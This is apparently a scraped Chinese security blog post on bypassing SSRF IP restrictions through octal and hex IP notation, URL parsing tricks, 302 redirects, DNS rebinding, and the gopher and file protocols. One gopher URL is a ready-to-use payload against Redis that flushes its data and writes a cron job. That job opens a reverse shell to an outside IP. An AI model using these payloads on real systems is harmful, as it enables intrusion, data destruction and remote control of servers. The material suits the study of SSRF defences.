2. 程式人生 > >7.SSRF漏洞繞過IP限制

7.SSRF漏洞繞過IP限制

阿新 發佈:2018-09-10
.net lock amp 第一次 寫法 target hsl post 服務

繞過SSRF過濾的幾種方法

下文出現的192.168.0.1,10.0.0.1全部為服務器端的內網地址。

1、更改IP地址寫法

一些開發者會通過對傳過來的URL參數進行正則匹配的方式來過濾掉內網IP,如采用如下正則表達式:

^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$

^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$

^192\.168(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$

對於這種過濾我們可以采用改編IP的寫法的方式進行繞過,例如192.168.0.1這個IP地址我們可以改寫成:

(1)、8進制格式:0300.0250.0.1

(2)、16進制格式:0xC0.0xA8.0.1

(3)、10進制整數格式:3232235521

(4)、16進制整數格式:0xC0A80001

還有一種特殊的省略模式,例如10.0.0.1這個IP可以寫成10.1

2、利用解析URL所出現的問題

在某些情況下,後端程序可能會對訪問的URL進行解析,對解析出來的host地址進行過濾。這時候可能會出現對URL參數解析不當,導致可以繞過過濾。

http://[email protected]/

當後端程序通過不正確的正則表達式(比如將http之後到com為止的字符內容,也就是www.baidu.com,認為是訪問請求的host地址時)對上述URL的

內容進行解析的時候,很有可能會認為訪問URL的host為www.baidu.com,而實際上這個URL所請求的內容都是192.168.0.1上的內容。

3、利用302跳轉

如果後端服務器在接收到參數後,正確的解析了URL的host,並且進行了過濾,我們這個時候可以使用302跳轉的方式來進行繞過。

(1)、在網絡上存在一個很神奇的服務,http://xip.io 當我們訪問這個網站的子域名的時候,例如192.168.0.1.xip.io,就會自動重定向到192.168.0.1。

(2)、由於上述方法中包含了192.168.0.1這種內網IP地址,可能會被正則表達式過濾掉,我們可以通過短地址的方式來繞過。經過測試發現新浪,百度

的短地址服務並不支持IP模式,所以這裏使用的是http://tinyurl.com所提供的短地址服務,如下圖所示:

技術分享圖片

同樣的,我們也可以自行寫一個跳轉的服務接口來實現類似的功能。

4、通過各種非HTTP協議:

如果服務器端程序對訪問URL所采用的協議進行驗證的話,可以通過非HTTP協議來進行利用。

(1)、GOPHER協議:通過GOPHER我們在一個URL參數中構造Post或者Get請求,從而達到攻擊內網應用的目的。例如我們可以使用GOPHER協議對

與內網的Redis服務進行攻擊,可以使用如下的URL:

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

(2)、File協議:File協議主要用於訪問本地計算機中的文件,我們可以通過類似file:///文件路徑這種格式來訪問計算機本地文件。使用file協議可以避免服

務端程序對於所訪問的IP進行的過濾。例如我們可以通過file:///d:/1.txt 來訪問D盤中1.txt的內容

5DNS Rebinding

對於常見的IP限制,後端服務器可能通過下圖的流程進行IP過濾:

技術分享圖片

對於用戶請求的URL參數,首先服務器端會對其進行DNS解析,然後對於DNS服務器返回的IP地址進行判斷,如果在黑名單中,就pass掉。

但是在整個過程中,第一次去請求DNS服務進行域名解析到第二次服務端去請求URL之間存在一個時間查,利用這個時間差,我們可以進行DNS 重綁定攻擊。

要完成DNS重綁定攻擊,我們需要一個域名,並且將這個域名的解析指定到我們自己的DNS Server,在我們的可控的DNS Server上編寫解析服務,設

置TTL時間為0。這樣就可以進行攻擊了,完整的攻擊流程為:

(1)、服務器端獲得URL參數,進行第一次DNS解析,獲得了一個非內網的IP

(2)、對於獲得的IP進行判斷,發現為非黑名單IP,則通過驗證

(3)、服務器端對於URL進行訪問,由於DNS服務器設置的TTL為0,所以再次進行DNS解析,這一次DNS服務器返回的是內網地址。

(4)、由於已經繞過驗證,所以服務器端返回訪問內網資源的結果。

三、總結

總的來說,造成能夠繞過服務器端檢查的原因是在服務器對資源進行請求的時候對URL的驗證出現了紕漏,

除了上述已知的方法外可能還有不同的方法,但是萬變不離其宗。同時,在程序員進行開發的同時,盡量使用白

名單的方式來進行過濾,能夠較大程度上的保證安全性。

7.SSRF漏洞繞過IP限制

相關推薦

7.SSRF漏洞繞過IP限制

.net lock amp 第一次 寫法 target hsl post 服務 繞過SSRF過濾的幾種方法 下文出現的192.168.0.1,10.0.0.1全部為服務器端的內網地址。 1、更改IP地址寫法 一些開發者會通過對傳過來的URL參數進行正則匹配的方式來過濾掉內網

《五分鐘速學技巧_利用ip代理繞過ip訪問限制防爬策略》

0x00序言 批量獲取代理IP詳見上篇文章《分享專案_python爬取可用代理ip》,在大量爬取某個指定網站時,若該網站做了限制單位時間內同個ip的訪問次數,則需要利用代理ip來幫助我們的爬蟲專案完成請求。獲取免費的代理IP很簡單,百度免費代理IP即可,本文中在點選開啟連結

dedecms5.7最新漏洞修復

嚴重 pac 找到 fig got sql 分享 工具 ecms 最近發現織夢cms被掛馬現象頻繁,解決好好幾個網站的問題,但是過不了多久,就又被攻擊了,即使更改系統及ftp密碼,也沒有起到防禦的作用,最後懷疑cms本身漏洞,於是采用工具掃描了一下,才發現問題的嚴重性,在這

php反序列化漏洞繞過魔術方法 __wakeup

prot poc cte enc repo private 成員 .html blank 0x01 前言 前天學校的ctf比賽,有一道題是關於php反序列化漏洞繞過wakeup,最後跟著大佬們學到了一波姿勢。。 0x02 原理 序列化與反序列化簡單介紹 序列化:把復雜的數據

js 科學計數法 轉換為 數字字符 突破冪數正數21位,負數7位的自動轉換限制

範圍 ace i++ 大於等於 位數 小數點 科學計算 個數 ons 前天工作中要轉換後臺返回的一個數據,返回是的科學計算的數字字符,用網上能搜索到的常用兩種方法轉換會有倍數的限制,然後又搜索了很久,還是沒有找到好的方法,雖然也有一些自己寫的方法,可還是不能像下面兩種方法

centos 7 網絡靜態IP配置文件

fix add bootp 網絡 con only mod gen boot    TYPE=EthernetPROXY_METHOD=noneBROWSER_ONLY=noBOOTPROTO=staticIPADDR=10.86.128.160GETWAY=10.86.1

Centos 7 學習之靜態IP設置

linux centos71、編輯 ifcfg-eth0 文件,vim 最小化安裝時沒有被安裝,需要自行安裝不描述。# vim /etc/sysconfig/network-scripts/ifcfg-eth02、修改如下內容BOOTPROTO="static" #dhcp改為static ONBO

CentOS 7 設置靜態IP

5.0 clas proto sys 設置 blog onf pts fig cd /etc/sysconfig/network-scripts/ sudo vi ifcfg-eno16777736 BOOTPROTO=static #dhcp改為static(修改) I

Readis For Windows安裝及密碼、IP限制

github edi 外部 使用 font post gpo 下一步 tro 一、下載與安裝Readis Github下載地址:https://github.com/MicrosoftArchive/redis/tags 下載.MSI後下一步安裝即可 二、驗證安裝 1、 在

SSRF漏洞淺析

取數 缺陷 獲取數據 服務端 ket 黑名單 查找 dom 名單 大部分web應用都提供了從其他的服務器上獲取數據的功能,如使用用戶指定的URL,web應用可以獲取圖片,下載文件,讀取文件內容等。如果服務端提供了從其他服務器應用獲取數據的功能且沒有對目標地址做過濾與限制,就

6.(轉載)SSRF漏洞挖掘經驗

desc 由於 sset 常見 -s anti 尋找 order esc SSRF 漏洞的尋找 一、從WEB功能上尋找 我們從上面的概述可以看出,SSRF是由於服務端獲取其他服務器的相關信息的功能中形成的,因此我們大可以 列舉幾種在web 應用中常見的從服務端獲取其他服務

檔案上傳漏洞繞過技巧

檔案上傳漏洞繞過技巧 一、檔案上傳漏洞介紹   通常web 站點會有使用者註冊功能,而當用戶登入之後大多數情況下都會存在類似頭像上傳、附件上傳一類的功能,這些功能點往往存在上傳驗證方式不嚴格的安全缺陷,是在web 滲透中非常關鍵的突破口,只要經過仔細測試分析來繞過上傳驗證機制,往往會造成被攻擊

織夢自定義表單新增訪客提交時間和訪客IP+限制每天每個IP提交表單次數

織夢給自定義表單新增訪客提交時間 不需要在模板htm裡新增js或者其他程式碼,按下面步驟來即可。 1、後臺 - 核心 - 頻道模型 - 自定義表單 - 新增新欄位 提交時間 time 單行文字(varchar) 2、開啟 /plus/diy.php 找到 $fiel

centos 7 檢視內網ip和外網ip

centos7 檢視內網的ip,使用ifconfig 或在後面加上引數,都可以檢視內網的ip,下面的10.105.33.17 即是內網的ip [[email protected]_33_17_centos ~]#ifconfig -a eth0: flags=4163<U

centos 7 配置多個IP地址

centos 7 配置多個IP地址 #開啟網路配置檔案 cd /etc/sysconfig/network-scripts/ vim ifcfg-eno167 找到IPADDR的位置,在下面再增加需要的地址(紅色部分): IPADDR="192.168.8.4" PREFIX="24"

Linux學習_003_虛擬機器CentOS 7.5 如何固定IP地址

  我們在使用虛擬機器的時候,虛擬機器的IP往往會變化,前期配置的SecureCRT連線、FTP連線需要重新修改,給我們的使用造成很大的不便。本文介紹瞭如何固定虛擬機器CentOS 7.5的IP的方法。 環境:  本地主機:win10  虛擬機器軟體:Vmware 14 PRO  虛擬機器:Cent

在爬蟲使用過程中解決ip被封鎖IP限制的幾種方法

方法1使用多IP代理:1.IP必須需要,比如ADSL。如果有條件,其實可以跟機房多申請外網IP。2.在有外網IP的機器上,部署代理伺服器。3.你的程式,使用輪訓替換代理伺服器來訪問想要採集的網站。好處:1.程式邏輯變化小,只需要代理功能。2.根據對方網站遮蔽規則不同,你只需要新增更多的代理就行了。3.就算具體

飛蟻代理在爬蟲使用過程中解決ip被封鎖IP限制的8種方法

方法1 使用多IP代理: 1.IP必須需要,比如ADSL。如果有條件,其實可以跟機房多申請外網IP。 2.在有外網IP的機器上,部署代理伺服器。 3.你的程式,使用輪訓替換代理伺服器來訪問想要採集的網站。 好處: 1.程式邏輯變化小,只需要代理功能。 2.根據對方網站遮蔽規則不同,你只需要新

高頻訪問IP限制 --Openresty(nginx + lua) [反爬蟲之旅][轉]

轉自[https://www.aliyun.com/jiaocheng/123498.html] 摘要:前言嗯….本人是從寫爬蟲開始程式設計的,不過後面做web寫網站去了,好了,最近web要搞反爬蟲了,哈哈哈,總算有機會把之以前做爬蟲時候見識過的反爬一點點給現在的網站用上了~做爬蟲的同志,

weblogic SSRF漏洞(CVE-2014-4210)檢測利用

Weblogic中存在一個SSRF漏洞,利用該漏洞可以傳送任意HTTP請求,進而攻擊內網中redis、fastcgi等脆弱元件。 SSRF漏洞檢測利用 指令碼檢測 def run(self): headers = { "User-